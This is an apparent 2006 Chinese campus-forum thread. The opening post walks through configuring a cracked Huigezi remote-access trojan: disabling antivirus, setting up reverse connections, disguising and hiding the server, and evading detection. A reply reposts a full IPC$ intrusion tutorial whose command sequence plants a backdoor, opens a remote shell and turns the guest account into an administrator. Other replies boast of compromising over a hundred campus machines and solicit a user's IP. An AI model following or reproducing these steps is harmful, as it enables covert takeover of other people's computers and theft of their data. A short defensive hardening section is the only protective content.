无语小小猪
小有名气
小有名气
  • 铜币0枚
  • 威望0点
  • 贡献值0点
阅读:3323回复:16

会用灰鸽子的进来帮忙。。探讨。。。

楼主#
更多 发布于:2006-02-06 22:14
灰鸽子 [VIP 专业版]  

功能简单介绍:  
【1】对远程计算机文件管理:模枋 Windows 资源管理器,可以对文件进行复制  
、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用  
。  
【2】远程控制命令:查看远程系统信息、剪切板查看、进程管理、服务管理、共  
享管理!  
【3】捕获屏幕:不但可以连继的捕获远程电脑屏幕,还能把本地的鼠标及键盘传  
动作送到远程实现实时控制功能!  
【4】视频语音,可以监控远程摄像头,还有语音监听和发送功能,可以和远程主  
机进行语音对话!  
【5】telnet(超级终端).  
【6】注册表模拟器:远程注册表操作就像操作本地注册表一样方便!  
【7】命令广播:可以对自动上线主机进行命令广播,如关机、重启、打开网页,  
筛选符合条件的机等,点一个按钮就可以让N台机器同时关机或进行其它操作!  
【8】服务端以服务方式启动,支持发送多种组合键,可以轻松管理远程服务器!  
【9】专用的自动上线系统,直接使用灰鸽子注册ID即可实现远程服务端自动上线  
!  
【10】多种自动上线方式:专用上线、DNS解析域名、固定IP等,用户自由选择!  

 
今天我们就用"灰鸽子sunray破解版"来向大家详细解析这款木马的服务端配置方  
式,只可实验,不可做坏事,大家不喜欢请跳过这一章。  
第一节:未雨绸缪,实验准备。  
第一,关闭杀毒软件,这点不用我说了吧~~~因为是木马,下载了之后如  
果杀毒软件监控开着的话肯定会被删除的。  
第二,当然是下载灰鸽子的软件啦~~~上网找,有很多~~~  

第三,申请一个免费的主页空间,为什么要呢?因为灰鸽子是可以反弹  
式链接的,也就是说,服务端通过登陆你的主页的特定文件就可以主动连接到你  
的电脑让你控制了。(这一点,等一下会详细解说)  
第二节:实战开始。  
把我们刚才下来的文件解压到某个文件夹,记住,不要改文件夹的名字,后面会  
用到。  
解压的文件里面有以下几个文件:  
H_Client.exe 这个是客户端的主要文件,可以配置文件,生成服务端,可以远  
程控制客户端。  
http.exe 这个是本地http服务器,因为我们的灰鸽子是破解版的,通常正式版  
的灰鸽子会到官方的服务器上去验证你的软件是否正版,所以这个软件就是用来  
在本机子上建一个服务器,骗过软件的,从而达到破解的目的。  
sunray.exe 这个里面其实也就只是一个host,它把http://www.huigezi.com这  
个网站的域名本地解析到本机,而不是解析到官方网站。  
vip_2005_0113.rar 这个是验证的软件,当我们的软件解析到本机的时候它就会  
下载这一个到客户端,用来验证用的。  
其它的文件还有config2005.asp,Operate.ini 还有四个文件夹,他们分别是  
(dat images login sound)我也不知道什么用的。应该是配置用的。  

第一步:在你的电脑上新建一个ip.txt的文本文件,内容如下:  
http://huigezi212.126.131.43:8000end  
其中212.126.131.43这个是我的电脑IP地址,8000是连接的端口,你可以把它写  
成你自己的IP地址,端口一般不要去改动,然后把这个文件上传到你刚才申请的  
空间,如果你的电脑是动态IP的话,那你就要经常更新这个文件的内容,然后上传  
到空间,它的目的是客户端上线的话就会去这个网站读取这个文件,然后主动和  
你取得连接。  
第二步,首先运行 sunray.exe,然后运行 http.exe 点开始服务!  
第三步,运行客户端,也就是H_Client.exe这个文件,  

点击“自动上线”选项,有几个要点要说的,  

1)“备用自动上线,URL转向域名或网页文件,这里呢,填写你刚才申  
请到的网站空间地址和ip.txt,比如http://你的网站地址/ip.txt  
(当然,如果你是固定IP的话呢,可以写你的IP地址,那么前面的申请空间,上传文件几步可以省略)  
2) “自动连接密码”,这个是表示你可以连接到的电脑所要用到的密  
码,如果为空的话,也没什么大不了的,顶多就是别人也可以用你的“肉鸡”  
3)“配置说明”建议你把“只使用备用自动上线”前的勾打上,因为我  
们的软件是破解版的,官方的那个服务器我们是用不了啦~~~  
4)“用户名称”“用户密码”这两个地方乱填些数字进去就行了,破解  
版用不了正式版的服务器的,它是服务器用来验证软件是否“正版”用的。  

“安装选项”选项卡,建议修改一下名字,以免被发现,其它的自己看  
着办,看着喜欢就选吧~~~^_^  
“启动项”这个很重要,建议你修改一下名字,它主要是服务端随系统  
自动启动用的,也是自己看着办。其中的“生成服务”这一项是为了达到隐藏用  
的,这也是我们经常说的手工清除木马的关键。也是长期以来很多人说无法清除  
灰鸽子的原因,因为它写成了服务,这个的优先级是系统级的,所有使用这台电  
脑的用户都会启动木马。  
“代理服务”,嘻嘻,就是你控制的电脑可以给我们做为一台代理服务  
器,说不定人家公布出来的代理服~务器地址有一部分是这些电脑的哦~~~  
“高级选项”这里主要是用来对付杀毒软件和防火墙用的,默认是插入  
IEXPLORER,启动隐藏文件隐藏插入的IE进程,以及使用UPX压缩,这里就不用去  
改它的,默认就行。  
"服务器图标”是用来伪装用的,你自己选项自己喜欢的图标吧~~~  
配置好了就点击生成服务器,软件会优先从官方验证,但没效,出错了后就从本  
地服务器验证,这就是我们要本机建http服务器的原因。好了,到此,服务端就  
生成了,不要运行它,运行了你就会中木马的,(不准做坏事)  
软件使用方法:当别人中了你的木马后,它会从你的网站读取ip.txt这个文件,  
然后主动连接到你的电脑,如果你此时也打开了客户端的话,连接建立成功,你  
可以控制这台电脑了。具体有什么内容你自己摸索,  
如果你是动态IP地址的话,那么你要每次把新的ip.txt上传到网站上去~~~  

灰鸽子第三章:服务端工作方式:  
灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门  
的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门  
都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在  
合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事  
,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带  
来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此  
我们只能进行简要介绍。  
灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服  
务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动  
连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称  
,进程隐藏方式,使用的壳,代理,图标等等。  
服务端对客户端连接方式有多种,使得处于各种网络环境的用户都可能中毒  
,包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。  
下面介绍服务端:  
配置出来的服务端文件文件名为G_Server.exe(这是默认的,当然也可以改  
洌H缓蠛诳屠靡磺邪旆ㄓ掌没г诵蠫_Server.exe程序。具体采用什么办法  
,读者可以充分发挥想象力,这里就不赘述。  
G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目  
录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和  
G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和  
G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,  
G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子的文件  
、服务的注册表项,甚至是进程中的模块名。截获的函数主要是用来遍历文件、  
遍历注册表项和遍历进程模块的一些函数。所以,有些时候用户感觉种了毒,但  
仔细检查却又发现不了什么异常。有些灰鸽子会多释放出一个名为  
G_ServerKey.dll的文件用来记录键盘操作。注意,G_Server.exe这个名称并不固  
定,它是可以定制的,比如当定制服务端文件名为A.exe时,生成的文件就是  
A.exe、A.dll和A_Hook.dll。  
Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启  
动项),每次开机都能自动运行,运行后启动G_Server.dll和G_Server_Hook.dll  
并自动退出。G_Server.dll文件实现后门功能,与控制端客户端进行通信;  
G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此,中毒后,我们看不到  
病毒文件,也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同,  
G_Server_Hook.dll有时候附在Explorer.exe的进程空间中,有时候则是附在所有  
进程中。  
灰鸽子的作者对于如何逃过杀毒软件的查杀花了很大力气。由于一些API函数  
被截获,正常模式下难以遍历到灰鸽子的文件和模块,造成查杀上的困难。要卸  
载灰鸽子动态库而且保证系统进程不崩溃也很麻烦,因此造成了近期灰鸽子在互  
联网上泛滥的局面。  
  
得到的不是想要的.没有的才是最好的~
无语小小猪
小有名气
小有名气
  • 铜币0枚
  • 威望0点
  • 贡献值0点
1C#
发布于:2006-02-06 22:21
Re:会用灰鸽子的进来帮忙。。探讨。。。
沙发留给自己!!呵呵~~
上面的步骤大家可粗看!主要看下实际操作!
有没有会使灰鸽子的?怎么才能开启灰鸽子后出现自动上线的主机呢??
怎么新建IP.TXT文本文件啊?这个就是关键的第一步。上面有。。大家看。。。
得到的不是想要的.没有的才是最好的~
无语小小猪
小有名气
小有名气
  • 铜币0枚
  • 威望0点
  • 贡献值0点
2C#
发布于:2006-02-06 22:24
Re:会用灰鸽子的进来帮忙。。探讨。。。
板凳也自己坐了吧!嘻嘻嘻嘻。。。。。
还有那位大哥有精通的给指点一下吧!!~~~谢谢
得到的不是想要的.没有的才是最好的~
0000
作家
作家
  • 铜币143枚
  • 威望34点
  • 贡献值1点
3C#
发布于:2006-02-07 08:33
Re:会用灰鸽子的进来帮忙。。探讨。。。
灰鸽子 过于"经典"了吧~~
.--. |o_o | |:_/ | // \ \ (| | ) /'\_ _/`\ \___)=(___/
无语小小猪
小有名气
小有名气
  • 铜币0枚
  • 威望0点
  • 贡献值0点
4C#
发布于:2006-02-07 12:05
Re:会用灰鸽子的进来帮忙。。探讨。。。
虽然是比较老了!但是的确是经典啊~~~望帮忙!!
得到的不是想要的.没有的才是最好的~
zyx
zyx
著名写手
著名写手
  • 铜币17枚
  • 威望0点
  • 贡献值0点
  • 社区居民
5C#
发布于:2006-02-07 12:41
Re:会用灰鸽子的进来帮忙。。探讨。。。
曾经在实验楼对康庄的机器做过实验,仅成功一例!
似乎对内网跨子网的情况不是很好用,也可能是康庄的都爱开防火墙吧。
所谓酷其实就是标新立异,不拘一格,酷是一种植根在内但又表现在外的杂乱无章,是让人心乱如麻心急如焚心花怒放却总是心头一颤的结合;所谓超酷就是这种让人心乱如麻心急如焚心花怒放却总是心头一颤的结合的杂乱无章的酷的一种超脱和升华;超酷就是比酷多一个'超"字以你的智商应该很好区别...
suchasplus
作家
作家
  • 铜币16枚
  • 威望11点
  • 贡献值1点
6C#
发布于:2006-02-07 12:44
Re:会用灰鸽子的进来帮忙。。探讨。。。
康庄直接用IPC$就可以了
不过本部应该更加容易,毕竟本部IP已经全部绑定了
The history of these days will be written in blood... By crushing the armies of our enemy, by seizing the weapons they thought to turn against us, we were fighting for our very existence!
zyx
zyx
著名写手
著名写手
  • 铜币17枚
  • 威望0点
  • 贡献值0点
  • 社区居民
7C#
发布于:2006-02-07 12:54
Re:会用灰鸽子的进来帮忙。。探讨。。。
IPC$共享也搞不出什么有用的东西啊
七楼的能说得详细些么
所谓酷其实就是标新立异,不拘一格,酷是一种植根在内但又表现在外的杂乱无章,是让人心乱如麻心急如焚心花怒放却总是心头一颤的结合;所谓超酷就是这种让人心乱如麻心急如焚心花怒放却总是心头一颤的结合的杂乱无章的酷的一种超脱和升华;超酷就是比酷多一个'超"字以你的智商应该很好区别...
我必美极
普通会员
普通会员
  • 铜币0枚
  • 威望0点
  • 贡献值0点
8C#
发布于:2006-02-07 16:40
Re:会用灰鸽子的进来帮忙。。探讨。。。
各位“黑客”,用木马进我电脑干啥都行,摆脱各位别删我硬盘里的毛片。
都存在E盘,可以复制粘贴走,谢谢了[em093]
[img]http://www.wait4c.com/bbs/userfiles/14819/2006020815013138750.jpg[/img]
suchasplus
作家
作家
  • 铜币16枚
  • 威望11点
  • 贡献值1点
9C#
发布于:2006-02-07 18:52
Re:会用灰鸽子的进来帮忙。。探讨。。。
楼上的IP多少?
The history of these days will be written in blood... By crushing the armies of our enemy, by seizing the weapons they thought to turn against us, we were fighting for our very existence!
suchasplus
作家
作家
  • 铜币16枚
  • 威望11点
  • 贡献值1点
10C#
发布于:2006-02-07 18:55
Re:会用灰鸽子的进来帮忙。。探讨。。。
IPC$共享也搞不出什么有用的东西啊七楼的能说得详细些么


[a=http://images.enet.com.cn/eschool/wmv/ipc.wmv]点此教学视频下载[/a]


From Xfocus

一份详尽的IPC$入侵资料

创建时间:2003-03-16
文章属性:原创
文章来源:菜菜鸟社区http://ccbirds.yeah.net
文章提交:iqst (papabang_at_qingdaonews.com)

[ccbirds入门级教程]--各个击破1--ipc$入侵

一 唠叨一下:
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).
因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!


二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.

解惑:
1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表


三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.


四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
  

五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.


六  如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。


七  如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码,防止通过ipc$穷举密码


(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net)


八 相关命令
1)建立空连接:
net use \\IP\ipc$ "" /user:""        (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码"     (同样有3个空格)

3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名"       (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接
net use \\IP\ipc$ /del

5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认


九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
  
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
  
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
  
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
  
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
  
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
  
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
  
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组    
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)


十 总结:
关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.
最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)

完成时间:iqst-2003/2/16 23:01 http://ccbirds.yeah.net
更新时间:2003/2/17/23:06
[ccbirds入门级教程]--各个击破1--ipc$入侵
The history of these days will be written in blood... By crushing the armies of our enemy, by seizing the weapons they thought to turn against us, we were fighting for our very existence!
无语小小猪
小有名气
小有名气
  • 铜币0枚
  • 威望0点
  • 贡献值0点
11C#
发布于:2006-02-07 20:19
Re:会用灰鸽子的进来帮忙。。探讨。。。
各位“黑客”,用木马进我电脑干啥都行,摆脱各位别删我硬盘里的毛片。都存在E盘,可以复制粘贴走,谢谢了


无语了。。。。
中个鸽子,以后就可以去你那里看YELLOW 小 MOVIE 了啦
呵呵。。
得到的不是想要的.没有的才是最好的~
金枪将
知名人士
知名人士
  • 铜币0枚
  • 威望0点
  • 贡献值0点
12C#
发布于:2006-02-15 10:16
Re:会用灰鸽子的进来帮忙。。探讨。。。
老掉牙 的东西了
suchasplus
作家
作家
  • 铜币16枚
  • 威望11点
  • 贡献值1点
13C#
发布于:2006-02-15 13:42
Re:会用灰鸽子的进来帮忙。。探讨。。。
师兄难得来转一下啊
The history of these days will be written in blood... By crushing the armies of our enemy, by seizing the weapons they thought to turn against us, we were fighting for our very existence!
yhackert
小有名气
小有名气
  • 铜币40枚
  • 威望7点
  • 贡献值0点
14C#
发布于:2006-02-18 01:50
Re:会用灰鸽子的进来帮忙。。探讨。。。
学校的网络那么垃圾~还需要用会鸽子这么牛比的工具

用个139漏洞弱口令就能找到一些肉鸡~~~~~~~~~~~~

2004年7月,我在那边找了100多台肉鸡~~~~~~~~~
瘦人
著名写手
著名写手
  • 铜币23枚
  • 威望2点
  • 贡献值2点
15C#
发布于:2006-02-19 00:40
Re:会用灰鸽子的进来帮忙。。探讨。。。
[fly]我被放过鸽子~[/fly]
Look up the star...
流氓无产者
普通会员
普通会员
  • 铜币0枚
  • 威望0点
  • 贡献值0点
16C#
发布于:2006-02-20 13:21
Re:会用灰鸽子的进来帮忙。。探讨。。。
各位“黑客”,用木马进我电脑干啥都行,摆脱各位别删我硬盘里的毛片。都存在E盘,可以复制粘贴走,谢谢了


nb
游客

返回顶部